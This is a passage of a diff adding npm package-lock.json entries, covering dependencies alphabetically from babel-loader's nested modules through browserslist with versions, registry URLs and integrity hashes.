"sha512-RjhtfwJOxzcFmNOi6ltcbcu4Iu+FL3zEj83dk4kAS+fVpTxXLO1b38RvJgT/0QwvV/L3aY9TAnyv0EOqW4GoMQ==", + "dev": true, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + } + }, + "node_modules/babel-loader/node_modules/pkg-dir": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-7.0.0.tgz", + "integrity": "sha512-Ie9z/WINcxxLp27BKOCHGde4ITq9UklYKDzVo1nhk5sqGEXU3FpkwP5GM2voTGJkGd9B3Otl+Q4uwSOeSUtOBA==", + "dev": true, + "dependencies": { + "find-up": "^6.3.0" + }, + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/babel-loader/node_modules/schema-utils": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.0.1.tgz", + "integrity": "sha512-lELhBAAly9NowEsX0yZBlw9ahZG+sK/1RJ21EpzdYHKEs13Vku3LJ+MIPhh4sMs0oCCeufZQEQbMekiA4vuVIQ==", + "dev": true, + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 12.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/babel-loader/node_modules/yocto-queue": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-1.0.0.tgz", + "integrity": "sha512-9bnSc/HEW2uRy67wc+T8UwauLuPJVn28jb+GtJY16iiKWyvmYJRXVT4UamsAEGQfPohgr2q4Tq0sQbQlxTfi1g==", + "dev": true, + "engines": { + "node": ">=12.20" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/babel-plugin-macros": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/babel-plugin-macros/-/babel-plugin-macros-3.1.0.tgz", + "integrity": "sha512-Cg7TFGpIr01vOQNODXOOaGz2NpCU5gl8x1qJFbb6hbZxR7XrcE2vtbAsTAbJ7/xwJtUuJEw8K8Zr/AE0LHlesg==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.12.5", + "cosmiconfig": "^7.0.0", + "resolve": "^1.19.0" + }, + "engines": { + "node": ">=10", + "npm": ">=6" + } + }, + "node_modules/babel-plugin-module-resolver": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/babel-plugin-module-resolver/-/babel-plugin-module-resolver-5.0.2.tgz", + "integrity": "sha512-9KtaCazHee2xc0ibfqsDeamwDps6FZNo5S0Q81dUqEuFzVwPhcT4J5jOqIVvgCA3Q/wO9hKYxN/Ds3tIsp5ygg==", + "dev": true, + "dependencies": { + "find-babel-config": "^2.1.1", + "glob": "^9.3.3", + "pkg-up": "^3.1.0", + "reselect": "^4.1.7", + "resolve": "^1.22.8" + } + }, + "node_modules/babel-plugin-module-resolver/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/babel-plugin-module-resolver/node_modules/glob": { + "version": "9.3.5", + "resolved": "https://registry.npmjs.org/glob/-/glob-9.3.5.tgz", + "integrity": "sha512-e1LleDykUz2Iu+MTYdkSsuWX8lvAjAcs0Xef0lNIu0S2wOAzuTxCJtcd9S3cijlwYF18EsU3rzb8jPVobxDh9Q==", + "dev": true, + "dependencies": { + "fs.realpath": "^1.0.0", + "minimatch": "^8.0.2", + "minipass": "^4.2.4", + "path-scurry": "^1.6.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/babel-plugin-module-resolver/node_modules/minimatch": { + "version": "8.0.4", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-8.0.4.tgz", + "integrity": "sha512-W0Wvr9HyFXZRGIDgCicunpQ299OKXs9RgZfaukz4qAW/pJhcpUfupc9c+OObPOFueNy8VSrZgEmDtk6Kh4WzDA==", + "dev": true, + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/babel-plugin-module-resolver/node_modules/minipass": { + "version": "4.2.8", + "resolved": "https://registry.npmjs.org/minipass/-/minipass-4.2.8.tgz", + "integrity": "sha512-fNzuVyifolSLFL4NzpF+wEF4qrgqaaKX0haXPQEdQ7NKAN+WecoKMHV09YcuL/DHxrUsYQOK3MiuDf7Ip2OXfQ==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/babel-plugin-polyfill-corejs2": { + "version": "0.4.11", + "resolved": "https://registry.npmjs.org/babel-plugin-polyfill-corejs2/-/babel-plugin-polyfill-corejs2-0.4.11.tgz", + "integrity": "sha512-sMEJ27L0gRHShOh5G54uAAPaiCOygY/5ratXuiyb2G46FmlSpc9eFCzYVyDiPxfNbwzA7mYahmjQc5q+CZQ09Q==", + "dev": true, + "dependencies": { + "@babel/compat-data": "^7.22.6", + "@babel/helper-define-polyfill-provider": "^0.6.2", + "semver": "^6.3.1" + }, + "peerDependencies": { + "@babel/core": "^7.4.0 || ^8.0.0-0 <8.0.0" + } + }, + "node_modules/babel-plugin-polyfill-corejs3": { + "version": "0.10.4", + "resolved": "https://registry.npmjs.org/babel-plugin-polyfill-corejs3/-/babel-plugin-polyfill-corejs3-0.10.4.tgz", + "integrity": "sha512-25J6I8NGfa5YkCDogHRID3fVCadIR8/pGl1/spvCkzb6lVn6SR3ojpx9nOn9iEBcUsjY24AmdKm5khcfKdylcg==", + "dev": true, + "dependencies": { + "@babel/helper-define-polyfill-provider": "^0.6.1", + "core-js-compat": "^3.36.1" + }, + "peerDependencies": { + "@babel/core": "^7.4.0 || ^8.0.0-0 <8.0.0" + } + }, + "node_modules/babel-plugin-polyfill-regenerator": { + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/babel-plugin-polyfill-regenerator/-/babel-plugin-polyfill-regenerator-0.6.2.tgz", + "integrity": "sha512-2R25rQZWP63nGwaAswvDazbPXfrM3HwVoBXK6HcqeKrSrL/JqcC/rDcf95l4r7LXLyxDXc8uQDa064GubtCABg==", + "dev": true, + "dependencies": { + "@babel/helper-define-polyfill-provider": "^0.6.2" + }, + "peerDependencies": { + "@babel/core": "^7.4.0 || ^8.0.0-0 <8.0.0" + } + }, + "node_modules/babel-plugin-react-transform": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/babel-plugin-react-transform/-/babel-plugin-react-transform-2.0.2.tgz", + "integrity": "sha512-y/e6c6xTp5vNAOWJ628872w0ntFbiM4baNSvubOE4xWIEeI8J3npUz0I1DVbzcjijtyket2WRXSqCFYoI3ENZQ==", + "dev": true, + "dependencies": { + "lodash": "^4.6.1" + } + }, + "node_modules/babel-plugin-transform-react-remove-prop-types": { + "version": "0.3.3", + "resolved": "https://registry.npmjs.org/babel-plugin-transform-react-remove-prop-types/-/babel-plugin-transform-react-remove-prop-types-0.3.3.tgz", + "integrity": "sha512-JTASijWmnc92y7uqEH17cb092qois29MkLzaRU3fYAhV88aANm7R+SEkdcXt1kxMaX7x1Lh1OWbyexKtHNi3OQ==", + "dev": true + }, + "node_modules/babel-walk": { + "version": "3.0.0-canary-5", + "resolved": "https://registry.npmjs.org/babel-walk/-/babel-walk-3.0.0-canary-5.tgz", + "integrity": "sha512-GAwkz0AihzY5bkwIY5QDR+LvsRQgB/B+1foMPvi0FZPMl5fjD7ICiznUiBdLYMH1QYe6vqu4gWYytZOccLouFw==", + "dependencies": { + "@babel/types": "^7.9.6" + }, + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/backbone": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/backbone/-/backbone-1.6.0.tgz", + "integrity": "sha512-13PUjmsgw/49EowNcQvfG4gmczz1ximTMhUktj0Jfrjth0MVaTxehpU+qYYX4MxnuIuhmvBLC6/ayxuAGnOhbA==", + "dev": true, + "dependencies": { + "underscore": ">=1.8.3" + } + }, + "node_modules/backoff": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/backoff/-/backoff-2.5.0.tgz", + "integrity": "sha1-9hbtqdPktmuMp/ynn2lXIsX44m8=", + "dependencies": { + "precond": "0.2" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/balanced-match": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" + }, + "node_modules/bare-events": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", + "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", + "license": "Apache-2.0", + "optional": true + }, + "node_modules/bare-fs": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.0.1.tgz", + "integrity": "sha512-ilQs4fm/l9eMfWY2dY0WCIUplSUp7U0CT1vrqMg1MUdeZl4fypu5UP0XcDBK5WBQPJAKP1b7XEodISmekH/CEg==", + "license": "Apache-2.0", + "optional": true, + "dependencies": { + "bare-events": "^2.0.0", + "bare-path": "^3.0.0", + "bare-stream": "^2.0.0" + }, + "engines": { + "bare": ">=1.7.0" + } + }, + "node_modules/bare-os": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.0.tgz", + "integrity": "sha512-BUrFS5TqSBdA0LwHop4OjPJwisqxGy6JsWVqV6qaFoe965qqtaKfDzHY5T2YA1gUL0ZeeQeA+4BBc1FJTcHiPw==", + "license": "Apache-2.0", + "optional": true, + "engines": { + "bare": ">=1.14.0" + } + }, + "node_modules/bare-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", + "license": "Apache-2.0", + "optional": true, + "dependencies": { + "bare-os": "^3.0.1" + } + }, + "node_modules/bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", + "license": "Apache-2.0", + "optional": true, + "dependencies": { + "streamx": "^2.21.0" + }, + "peerDependencies": { + "bare-buffer": "*", + "bare-events": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + }, + "bare-events": { + "optional": true + } + } + }, + "node_modules/base": { + "version": "0.11.2", + "resolved": "https://registry.npmjs.org/base/-/base-0.11.2.tgz", + "integrity": "sha512-5T6P4xPgpp0YDFvSWwEZ4NoE3aM4QBQXDzmVbraCkFj8zHM+mba8SyqB5DbZWyR7mYHo6Y7BdQo3MoA4m0TeQg==", + "dev": true, + "dependencies": { + "cache-base": "^1.0.1", + "class-utils": "^0.3.5", + "component-emitter": "^1.2.1", + "define-property": "^1.0.0", + "isobject": "^3.0.1", + "mixin-deep": "^1.2.0", + "pascalcase": "^0.1.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/base-x": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/base-x/-/base-x-4.0.0.tgz", + "integrity": "sha512-FuwxlW4H5kh37X/oW59pwTzzTKRzfrrQwhmyspRM7swOEZcHtDZSCt45U6oKgtuFE+WYPblePMVIPR4RZrh/hw==" + }, + "node_modules/base/node_modules/define-property": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/define-property/-/define-property-1.0.0.tgz", + "integrity": "sha512-cZTYKFWspt9jZsMscWo8sc/5lbPC9Q0N5nBLgb+Yd915iL3udB1uFgS3B8YCx66UVHq018DAVFoee7x+gxggeA==", + "dev": true, + "dependencies": { + "is-descriptor": "^1.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/base64-js": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz", + "integrity": "sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/base64-stream": { + "version": "0.1.5", + "resolved": "https://registry.npmjs.org/base64-stream/-/base64-stream-0.1.5.tgz", + "integrity": "sha512-j3OFbLDb8Wy0SM7HrP1zj8ADVHqaKoL8VNrDnd7wedkoz5onf9le2DgOsCdmg8QQPnUPXd7LLCjGnYAk/YDBFg==", + "dependencies": { + "readable-stream": "^2.0.2" + } + }, + "node_modules/base64-stream/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha1-u5NdSFgsuhaMBoNJV6VKPgcSTxE=" + }, + "node_modules/base64-stream/node_modules/readable-stream": { + "version": "2.3.7", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.7.tgz", + "integrity": "sha512-Ebho8K4jIbHAxnuxi7o42OrZgF/ZTNcsZj6nRKyUmkhLFq8CHItp/fy6hQZuZmP/n3yZ9VBUbp4zz/mX8hmYPw==", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/base64-stream/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, + "node_modules/base64id": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/base64id/-/base64id-0.1.0.tgz", + "integrity": "sha1-As4P3u4M709ACA4ec+g08LG/zj8=", + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/base64url": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/base64url/-/base64url-3.0.1.tgz", + "integrity": "sha512-ir1UPr3dkwexU7FdV8qBBbNDRUhMmIekYMFZfi+C/sLNnRESKPl23nB9b2pltqfOQNnGzsDdId90AEtG5tCx4A==", + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/basic-auth": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/basic-auth/-/basic-auth-2.0.1.tgz", + "integrity": "sha512-NF+epuEdnUYVlGuhaxbbq+dvJttwLnGY+YixlXlME5KpQ5W3CnXA5cVTneY3SPbPDRkcjMbifrwmFYcClgOZeg==", + "dependencies": { + "safe-buffer": "5.1.2" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/batch": { + "version": "0.6.1", + "resolved": "https://registry.npmjs.org/batch/-/batch-0.6.1.tgz", + "integrity": "sha512-x+VAiMRL6UPkx+kudNvxTl6hB2XNNCG2r+7wixVfIYwu/2HKRXimwQyaumLjMveWvT2Hkd/cAJw+QBMfJ/EKVw==", + "dev": true, + "license": "MIT" + }, + "node_modules/bcrypt": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/bcrypt/-/bcrypt-5.0.1.tgz", + "integrity": "sha512-9BTgmrhZM2t1bNuDtrtIMVSmmxZBrJ71n8Wg+YgdjHuIWYF7SjjmCPZFB+/5i/o/PIeRpwVJR3P+NrpIItUjqw==", + "hasInstallScript": true, + "dependencies": { + "@mapbox/node-pre-gyp": "^1.0.0", + "node-addon-api": "^3.1.0" + }, + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/bcrypt-pbkdf": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", + "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", + "dependencies": { + "tweetnacl": "^0.14.3" + } + }, + "node_modules/bcryptjs": { + "version": "2.4.3", + "resolved": "https://registry.npmjs.org/bcryptjs/-/bcryptjs-2.4.3.tgz", + "integrity": "sha1-mrVie5PmBiH/fNrF2pczAn3x0Ms=" + }, + "node_modules/benchmark": { + "version": "2.1.4", + "resolved": "https://registry.npmjs.org/benchmark/-/benchmark-2.1.4.tgz", + "integrity": "sha512-l9MlfN4M1K/H2fbhfMy3B7vJd6AGKJVQn2h6Sg/Yx+KckoUA7ewS5Vv6TjSq18ooE1kS9hhAlQRH3AkXIh/aOQ==", + "dev": true, + "dependencies": { + "lodash": "^4.17.4", + "platform": "^1.3.3" + } + }, + "node_modules/benny": { + "version": "3.7.1", + "resolved": "https://registry.npmjs.org/benny/-/benny-3.7.1.tgz", + "integrity": "sha512-USzYxODdVfOS7JuQq/L0naxB788dWCiUgUTxvN+WLPt/JfcDURNNj8kN/N+uK6PDvuR67/9/55cVKGPleFQINA==", + "dev": true, + "dependencies": { + "@arrows/composition": "^1.0.0", + "@arrows/dispatch": "^1.0.2", + "@arrows/multimethod": "^1.1.6", + "benchmark": "^2.1.4", + "common-tags": "^1.8.0", + "fs-extra": "^10.0.0", + "json2csv": "^5.0.6", + "kleur": "^4.1.4", + "log-update": "^4.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/benny/node_modules/commander": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-6.2.1.tgz", + "integrity": "sha512-U7VdrJFnJgo4xjrHpTzu0yrHPGImdsmD95ZlgYSEajAn2JKzDhDTPG9kBTefmObL2w/ngeZnilk+OV9CG3d7UA==", + "dev": true, + "engines": { + "node": ">= 6" + } + }, + "node_modules/benny/node_modules/json2csv": { + "version": "5.0.7", + "resolved": "https://registry.npmjs.org/json2csv/-/json2csv-5.0.7.tgz", + "integrity": "sha512-YRZbUnyaJZLZUJSRi2G/MqahCyRv9n/ds+4oIetjDF3jWQA7AG7iSeKTiZiCNqtMZM7HDyt0e/W6lEnoGEmMGA==", + "dev": true, + "dependencies": { + "commander": "^6.1.0", + "jsonparse": "^1.3.1", + "lodash.get": "^4.4.2" + }, + "bin": { + "json2csv": "bin/json2csv.js" + }, + "engines": { + "node": ">= 10", + "npm": ">= 6.13.0" + } + }, + "node_modules/better-opn": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/better-opn/-/better-opn-3.0.2.tgz", + "integrity": "sha512-aVNobHnJqLiUelTaHat9DZ1qM2w0C0Eym4LPI/3JxOnSokGVdsl1T1kN7TFvsEAD8G47A6VKQ0TVHqbBnYMJlQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "open": "^8.0.4" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/big.js": { + "version": "6.1.1", + "resolved": "https://registry.npmjs.org/big.js/-/big.js-6.1.1.tgz", + "integrity": "sha512-1vObw81a8ylZO5ePrtMay0n018TcftpTA5HFKDaSuiUDBo8biRBtjIobw60OpwuvrGk+FsxKamqN4cnmj/eXdg==", + "engines": { + "node": "*" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/bigjs" + } + }, + "node_modules/bignumber.js": { + "version": "9.0.2", + "resolved": "https://registry.npmjs.org/bignumber.js/-/bignumber.js-9.0.2.tgz", + "integrity": "sha512-GAcQvbpsM0pUb0zw1EI0KhQEZ+lRwR5fYaAp3vPOYuP7aDvGy6cVN6XHLauvF8SOga2y0dcLcjt3iQDTSEliyw==", + "engines": { + "node": "*" + } + }, + "node_modules/binary-extensions": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/binary-extensions/-/binary-extensions-2.2.0.tgz", + "integrity": "sha512-jDctJ/IVQbZoJykoeHbhXpOlNBqGNcwXJKJog42E5HDPUwQTSdjCHdihjj0DlnheQ7blbT6dHOafNAiS8ooQKA==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/bindings": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/bindings/-/bindings-1.5.0.tgz", + "integrity": "sha512-p2q/t/mhvuOj/UeLlV6566GD/guowlr0hHxClI0W9m7MWYkL1F0hLo+0Aexs9HSPCtR1SXQ0TD3MMKrXZajbiQ==", + "dependencies": { + "file-uri-to-path": "1.0.0" + } + }, + "node_modules/bintrees": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/bintrees/-/bintrees-1.0.1.tgz", + "integrity": "sha1-DmVcm5wkNeqraL9AJyJtK1WjRSQ=" + }, + "node_modules/bl": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/bl/-/bl-4.1.0.tgz", + "integrity": "sha512-1W07cM9gS6DcLperZfFSj+bWLtaPGSOHWhPiGzXmvVJbRLdG82sH/Kn8EtW1VqWVA54AKf2h5k5BbnIbwF3h6w==", + "dependencies": { + "buffer": "^5.5.0", + "inherits": "^2.0.4", + "readable-stream": "^3.4.0" + } + }, + "node_modules/bl/node_modules/buffer": { + "version": "5.7.1", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-5.7.1.tgz", + "integrity": "sha512-EHcyIPBQ4BSGlvjB16k5KgAJ27CIsHY/2JBmCRReo48y9rQ3MaUzWX3KVlBa4U7MyX02HdVj0K7C3WaB3ju7FQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "base64-js": "^1.3.1", + "ieee754": "^1.1.13" + } + }, + "node_modules/blob-util": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/blob-util/-/blob-util-2.0.2.tgz", + "integrity": "sha512-T7JQa+zsXXEa6/8ZhHcQEW1UFfVM49Ts65uBkFL6fz2QmrElqmbajIDJvuA0tEhRe5eIjpV9ZF+0RfZR9voJFQ==", + "dev": true + }, + "node_modules/bluebird": { + "version": "3.7.2", + "resolved": "https://registry.npmjs.org/bluebird/-/bluebird-3.7.2.tgz", + "integrity": "sha512-XpNj6GDQzdfW+r2Wnn7xiSAd7TM3jzkxGXBGTtWKuSXv1xUV+azxAm8jdWZN06QTQk+2N2XB9jRDkvbmQmcRtg==" + }, + "node_modules/blueimp-md5": { + "version": "2.19.0", + "resolved": "https://registry.npmjs.org/blueimp-md5/-/blueimp-md5-2.19.0.tgz", + "integrity": "sha512-DRQrD6gJyy8FbiE4s+bDoXS9hiW3Vbx5uCdwvcCf3zLHL+Iv7LtGHLpr+GZV8rHG8tK766FGYBwRbu8pELTt+w==", + "dev": true + }, + "node_modules/body-parser": { + "version": "1.20.3", + "resolved": "https://registry.npmjs.org/body-parser/-/body-parser-1.20.3.tgz", + "integrity": "sha512-7rAxByjUMqQ3/bHJy7D6OGXvx/MMc4IqBn/X0fcM1QUcAItpZrBEYhWGem+tzXH90c+G01ypMcYJBO9Y30203g==", + "dependencies": { + "bytes": "3.1.2", + "content-type": "~1.0.5", + "debug": "2.6.9", + "depd": "2.0.0", + "destroy": "1.2.0", + "http-errors": "2.0.0", + "iconv-lite": "0.4.24", + "on-finished": "2.4.1", + "qs": "6.13.0", + "raw-body": "2.5.2", + "type-is": "~1.6.18", + "unpipe": "1.0.0" + }, + "engines": { + "node": ">= 0.8", + "npm": "1.2.8000 || >= 1.4.16" + } + }, + "node_modules/body-parser/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/body-parser/node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/body-parser/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g=" + }, + "node_modules/body-parser/node_modules/on-finished": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz", + "integrity": "sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==", + "dependencies": { + "ee-first": "1.1.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/bonjour-service": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/bonjour-service/-/bonjour-service-1.3.0.tgz", + "integrity": "sha512-3YuAUiSkWykd+2Azjgyxei8OWf8thdn8AITIog2M4UICzoqfjlqr64WIjEXZllf/W6vK1goqleSR6brGomxQqA==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "multicast-dns": "^7.2.5" + } + }, + "node_modules/boolbase": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/boolbase/-/boolbase-1.0.0.tgz", + "integrity": "sha1-aN/1++YMUes3cl6p4+0xDcwed24=", + "dev": true + }, + "node_modules/bootstrap": { + "version": "3.4.1", + "resolved": "https://registry.npmjs.org/bootstrap/-/bootstrap-3.4.1.tgz", + "integrity": "sha512-yN5oZVmRCwe5aKwzRj6736nSmKDX7pLYwsXiCj/EYmo16hODaBiT4En5btW/jhBF/seV+XMx3aYwukYC3A49DA==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/bootstrap-5": { + "name": "bootstrap", + "version": "5.3.3", + "resolved": "https://registry.npmjs.org/bootstrap/-/bootstrap-5.3.3.tgz", + "integrity": "sha512-8HLCdWgyoMguSO9o+aH+iuZ+aht+mzW0u3HIMzVu7Srrpv7EBBxTnrFlSCskwdY1+EOFQSm7uMJhNQHkdPcmjg==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/twbs" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/bootstrap" + } + ], + "peerDependencies": { + "@popperjs/core": "^2.11.8" + } + }, + "node_modules/bowser": { + "version": "2.11.0", + "resolved": "https://registry.npmjs.org/bowser/-/bowser-2.11.0.tgz", + "integrity": "sha512-AlcaJBi/pqqJBIQ8U9Mcpc9i8Aqxn88Skv5d+xBX006BY5u8N3mGLHa5Lgppa7L/HfwgwLgZ6NYs+Ag6uUmJRA==" + }, + "node_modules/brace-expansion": { + "version": "1.1.11", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", + "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", + "dependencies": { + "balanced-match": "^1.0.0", + "concat-map": "0.0.1" + } + }, + "node_modules/braces": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", + "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", + "dependencies": { + "fill-range": "^7.1.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/browser-assert": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/browser-assert/-/browser-assert-1.2.1.tgz", + "integrity": "sha512-nfulgvOR6S4gt9UKCeGJOuSGBPGiFT6oQ/2UBnvTY/5aQ1PnksW72fhZkM30DzoRRv2WpwZf1vHHEr3mtuXIWQ==", + "dev": true + }, + "node_modules/browser-process-hrtime": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/browser-process-hrtime/-/browser-process-hrtime-1.0.0.tgz", + "integrity": "sha512-9o5UecI3GhkpM6DrXr69PblIuWxPKk9Y0jHBRhdocZ2y7YECBFCsHm79Pr3OyR2AvjhDkabFJaDJMYRazHgsow==", + "dev": true + }, + "node_modules/browser-stdout": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/browser-stdout/-/browser-stdout-1.3.1.tgz", + "integrity": "sha512-qhAVI1+Av2X7qelOfAIYwXONood6XlZE/fXaBSmW/T5SzLAmCgzi+eiWE7fUvbHaeNBQH13UftjpXxsfLkMpgw==", + "dev": true, + "license": "ISC" + }, + "node_modules/browserslist": { + "version": "4.24.0", + "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.0.tgz", + "integrity": 